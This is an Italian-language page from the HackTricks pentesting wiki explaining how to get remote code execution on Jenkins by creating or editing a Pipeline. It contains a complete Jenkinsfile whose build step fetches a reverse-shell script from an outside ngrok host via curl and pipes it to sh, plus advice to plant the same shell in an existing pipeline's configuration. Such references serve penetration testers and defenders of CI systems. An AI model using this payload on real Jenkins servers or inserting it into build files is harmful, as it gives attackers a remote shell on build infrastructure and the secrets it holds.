Jenkins RCE Creating/Modifying Pipeline

Supporta HackTricks

Creare un nuovo Pipeline

In "New Item" (accessibile in /view/all/newJob) seleziona Pipeline:

Nella sezione Pipeline scrivi la reverse shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Finalmente clicca su Save, e Build Now e la pipeline verrà eseguita:

Modificare una Pipeline

Se puoi accedere al file di configurazione di una pipeline configurata, puoi semplicemente modificarlo aggiungendo la tua reverse shell e poi eseguirlo o aspettare che venga eseguito.

Supporta HackTricks

Last updated